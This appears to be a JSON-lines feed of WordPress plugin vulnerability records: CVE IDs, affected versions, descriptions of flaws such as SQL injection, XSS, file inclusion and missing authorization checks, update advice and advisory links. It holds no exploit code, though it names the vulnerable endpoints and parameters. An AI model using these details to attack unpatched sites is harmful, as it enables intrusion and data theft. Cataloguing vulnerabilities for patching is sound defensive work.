{"CVE_ID":"CVE-2021-4339","slug":"ulisting","versionImpact":"1.6.6","versionEndExcluding":"1.7","description":"The uListing plugin for WordPress is vulnerable to authorization bypass due to a missing capability check in the \"ulisting\/includes\/route.php\" file on the \/1\/api\/ulisting-user\/search REST-API route in versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to retrieve the list of all users and their email address in the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a6615fd-7c37-45d9-a657-0ba00df840e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a6615fd-7c37-45d9-a657-0ba00df840e5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6709","slug":"sync-post-with-other-site","versionImpact":"1.6","versionEndExcluding":"1.7","description":"The Sync Post With Other Site plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'sps_add_update_post' function in all versions up to, and including, 1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create new draft posts and update existing posts.","recommendation":"Update to version 1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d97eee1-0f72-4dd3-998a-acb454fa5e8a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3d97eee1-0f72-4dd3-998a-acb454fa5e8a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sync-post-with-other-site\\\/trunk\\\/includes\\\/sps_sync.class.php#L231\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sync-post-with-other-site\\\/trunk\\\/includes\\\/sps_sync.class.php#L231\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128945\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128945\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4753","slug":"wp-secure-maintainance","versionImpact":"1.6","versionEndExcluding":"1.7","description":"The WP Secure Maintenance WordPress plugin before 1.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81725b17-532a-43e6-8ce5-fe50a2ed0819\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81725b17-532a-43e6-8ce5-fe50a2ed0819\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13684","slug":"reset","versionImpact":"1.6","versionEndExcluding":"1.7","description":"The Reset plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6. This is due to missing or incorrect nonce validation on the reset_db_page() function. This makes it possible for unauthenticated attackers to reset several tables in the database like comments, themes, plugins, and more via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reset\\\/tags\\\/1.6\\\/delete_comments.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/reset\\\/tags\\\/1.6\\\/delete_comments.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2335533d-c38a-450c-9fa1-0e236b5e92e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2335533d-c38a-450c-9fa1-0e236b5e92e6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1639","slug":"animation-addons-for-elementor-pro","versionImpact":"1.6","versionEndExcluding":"1.7","description":"The Animation Addons for Elementor Pro plugin for WordPress is vulnerable to unauthorized arbitrary plugin installation due to a missing capability check on the install_elementor_plugin_handler() function in all versions up to, and including, 1.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install and activate arbitrary plugins which can be leveraged to further infect a victim when Elementor is not activated on a vulnerable site.","recommendation":"Update to version 1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/arolax-creative-digital-agency-theme\\\/53547630\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/arolax-creative-digital-agency-theme\\\/53547630\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb310bdb-fc74-47b2-9371-3d10abd287fb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb310bdb-fc74-47b2-9371-3d10abd287fb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4370","slug":"ulisting","versionEndExcluding":"1.7","description":"The uListing plugin for WordPress is vulnerable to authorization bypass as most actions and endpoints are accessible to unauthenticated users, lack security nonces, and data is seldom validated. This issue exists in versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to conduct numerous administrative actions, including those less critical than the explicitly outlined ones in our detection.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5ada976-03b8-4219-9ae3-9060fb7b9de5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5ada976-03b8-4219-9ae3-9060fb7b9de5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13665","slug":"admire-extra","versionImpact":"1.6","versionEndExcluding":"1.7","description":"The Admire Extra plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'space' shortcode in all versions up to, and including, 1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3233979%40admire-extra&new=3233979%40admire-extra\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3233979%40admire-extra&new=3233979%40admire-extra\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf682127-4b97-44ce-a94d-3a237c5af1cc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf682127-4b97-44ce-a94d-3a237c5af1cc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13409","slug":"post-grid-carousel-ultimate","versionImpact":"1.6.10","versionEndExcluding":"1.7","description":"The Post Grid, Slider & Carousel Ultimate \u2013 with Shortcode, Gutenberg Block & Elementor Widget plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.6.10 via the 'theme' parameter of the post_type_ajax_handler() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/ja.wordpress.org\\\/plugins\\\/post-grid-carousel-ultimate\\\/\",\"name\":\"https:\\\/\\\/ja.wordpress.org\\\/plugins\\\/post-grid-carousel-ultimate\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid-carousel-ultimate\\\/tags\\\/1.6.10\\\/includes\\\/classes\\\/ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-grid-carousel-ultimate\\\/tags\\\/1.6.10\\\/includes\\\/classes\\\/ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227281\\\/post-grid-carousel-ultimate\\\/tags\\\/1.7\\\/includes\\\/classes\\\/ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227281\\\/post-grid-carousel-ultimate\\\/tags\\\/1.7\\\/includes\\\/classes\\\/ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38672a45-b7a7-445f-9e77-7050df6920fa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/38672a45-b7a7-445f-9e77-7050df6920fa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13408","slug":"post-grid-carousel-ultimate","versionImpact":"1.6.10","versionEndExcluding":"1.7","description":"The Post Grid, Slider & Carousel Ultimate \u2013 with Shortcode, Gutenberg Block & Elementor Widget plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.6.10 via the 'theme' attribute of the `pgcu` shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php files can be uploaded and included.","recommendation":"Update to version 1.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227281\\\/post-grid-carousel-ultimate\\\/tags\\\/1.7\\\/includes\\\/classes\\\/shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3227281\\\/post-grid-carousel-ultimate\\\/tags\\\/1.7\\\/includes\\\/classes\\\/shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff346465-62c2-4a2b-8a4a-c88558d7cabd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff346465-62c2-4a2b-8a4a-c88558d7cabd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4346","slug":"ulisting","versionImpact":"1.6.6","versionEndExcluding":"1.7","description":"The uListing plugin for WordPress is vulnerable to Unauthenticated Arbitrary Account Changes in versions up to, and including, 1.6.6. This is due to missing login checks on the stm_listing_profile_edit AJAX action. This makes it possible for unauthenticated attackers to edit any account on the blog, such as changing the admin account's email address.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41800ea9-1ace-42fc-9e7f-d760a126342b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41800ea9-1ace-42fc-9e7f-d760a126342b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4345","slug":"ulisting","versionImpact":"1.6.6","versionEndExcluding":"1.7","description":"The uListing plugin for WordPress is vulnerable to authorization bypass due to missing capability and nonce checks on the UlistingUserRole::save_role_api method in versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to remove or add roles, and add capabilities.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44e112a7-8f51-4d2a-a4b3-74a47ef3aec7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44e112a7-8f51-4d2a-a4b3-74a47ef3aec7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2456786%40ulisting&new=2456786%40ulisting&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4341","slug":"ulisting","versionImpact":"1.6.6","versionEndExcluding":"1.7","description":"The uListing plugin for WordPress is vulnerable to authorization bypass via Ajax due to missing capability checks, missing input validation, and a missing security nonce in the stm_update_email_data AJAX action in versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to change any WordPress option in the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1814537d-8307-4d1f-86c8-801519172be5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1814537d-8307-4d1f-86c8-801519172be5?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4340","slug":"ulisting","versionImpact":"1.6.6","versionEndExcluding":"1.7","description":"The uListing plugin for WordPress is vulnerable to generic SQL Injection via the \u2018listing_id\u2019 parameter in versions up to, and including, 1.6.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10b7a88f-ce46-42aa-ab5a-81f38288a659?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10b7a88f-ce46-42aa-ab5a-81f38288a659?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ulisting-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5585","slug":"so-widgets-bundle","versionImpact":"1.68.5","versionEndExcluding":"1.69.0","description":"The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `data-url` DOM Element Attribute in all versions up to, and including, 1.68.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.69.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/so-widgets-bundle\\\/tags\\\/1.68.4\\\/js\\\/slider\\\/jquery.slider.js\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/so-widgets-bundle\\\/tags\\\/1.68.4\\\/js\\\/slider\\\/jquery.slider.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb1b93ee-8641-4ddb-8b6b-2e9d30fe338d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bb1b93ee-8641-4ddb-8b6b-2e9d30fe338d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4799","slug":"wp-downloadmanager","versionImpact":"1.68.10","versionEndExcluding":"1.68.11","description":"The WP-DownloadManager plugin for WordPress is vulnerable to arbitrary file deletion due to lack of restriction on the directory a file can be deleted from in all versions up to, and including, 1.68.10. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). This vulnerability can be paired with CVE-2025-4798 to delete any file within the WordPress root directory.","recommendation":"Update to version 1.68.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-downloadmanager\\\/trunk\\\/download-manager.php#L215\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-downloadmanager\\\/trunk\\\/download-manager.php#L215\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-downloadmanager\\\/trunk\\\/download-options.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-downloadmanager\\\/trunk\\\/download-options.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-downloadmanager\\\/trunk\\\/download-options.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-downloadmanager\\\/trunk\\\/download-options.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3294467\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3294467\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9d9e485-171f-4e36-943d-397d540e31f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9d9e485-171f-4e36-943d-397d540e31f4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4798","slug":"wp-downloadmanager","versionImpact":"1.68.10","versionEndExcluding":"1.68.11","description":"The WP-DownloadManager plugin for WordPress is vulnerable to arbitrary file read in all versions up to, and including, 1.68.10. This is due to a lack of restriction on the directory an administrator can select for storing downloads. This makes it possible for authenticated attackers, with Administrator-level access and above, to download and read any file on the server, including system and configuration files.","recommendation":"Update to version 1.68.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-downloadmanager\\\/trunk\\\/download-options.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-downloadmanager\\\/trunk\\\/download-options.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-downloadmanager\\\/trunk\\\/download-options.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-downloadmanager\\\/trunk\\\/download-options.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3294467\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3294467\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6cd166bc-774e-4083-b5f7-bffba1f7c293?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6cd166bc-774e-4083-b5f7-bffba1f7c293?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5770","slug":"wp-force-ssl","versionImpact":"1.66","versionEndExcluding":"1.67","description":"The WP Force SSL & HTTPS SSL Redirect plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ajax_save_setting' function in versions up to, and including, 1.66. This makes it possible for authenticated attackers, subscriber-level permissions and above, to update the plugin settings.","recommendation":"Update to version 1.67, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2081e4a-c6b7-4730-be59-bc728b90ecaa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2081e4a-c6b7-4730-be59-bc728b90ecaa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-force-ssl\\\/tags\\\/1.66\\\/wp-force-ssl.php#L953\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-force-ssl\\\/tags\\\/1.66\\\/wp-force-ssl.php#L953\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/swisskyrepo.github.io\\\/PayloadsAllTheThings\\\/CRLF%20Injection\\\/\",\"name\":\"https:\\\/\\\/swisskyrepo.github.io\\\/PayloadsAllTheThings\\\/CRLF%20Injection\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099110\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099110\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11366","slug":"seo-landing-page-generator","versionImpact":"1.66.2","versionEndExcluding":"1.66.3","description":"The SEO Landing Page Generator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.66.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.66.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-landing-page-generator\\\/trunk\\\/admin\\\/class-issslpg-admin-location-settings-page.php#L185\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-landing-page-generator\\\/trunk\\\/admin\\\/class-issslpg-admin-location-settings-page.php#L185\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-landing-page-generator\\\/trunk\\\/admin\\\/class-issslpg-admin-location-settings-page.php#L330\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-landing-page-generator\\\/trunk\\\/admin\\\/class-issslpg-admin-location-settings-page.php#L330\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-landing-page-generator\\\/trunk\\\/admin\\\/class-issslpg-admin-location-settings-page.php#L433\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-landing-page-generator\\\/trunk\\\/admin\\\/class-issslpg-admin-location-settings-page.php#L433\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197642%40seo-landing-page-generator&new=3197642%40seo-landing-page-generator&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197642%40seo-landing-page-generator&new=3197642%40seo-landing-page-generator&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99dcb6c4-b9c6-4d3d-942f-b3877cc3efa7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99dcb6c4-b9c6-4d3d-942f-b3877cc3efa7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5706","slug":"vk-blocks","versionImpact":"1.63.0.1","versionEndExcluding":"1.64.0.0","description":"The VK Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'vk-blocks\/ancestor-page-list' block in all versions up to, and including, 1.63.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.64.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05dd7c96-7880-44a8-a06f-037bc627fd8d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05dd7c96-7880-44a8-a06f-037bc627fd8d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/tags\\\/1.63.0.1\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/ancestor-page-list\\\/index.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/tags\\\/1.63.0.1\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/ancestor-page-list\\\/index.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/tags\\\/1.63.0.1\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/ancestor-page-list\\\/index.php#L54\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/tags\\\/1.63.0.1\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/ancestor-page-list\\\/index.php#L54\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/tags\\\/1.63.0.1\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/ancestor-page-list\\\/index.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-blocks\\\/tags\\\/1.63.0.1\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/ancestor-page-list\\\/index.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2983202\\\/vk-blocks\\\/trunk\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/ancestor-page-list\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2983202\\\/vk-blocks\\\/trunk\\\/inc\\\/vk-blocks\\\/build\\\/blocks\\\/ancestor-page-list\\\/index.php\",\"refsource\":\"\",\"tags\":[]}]"}
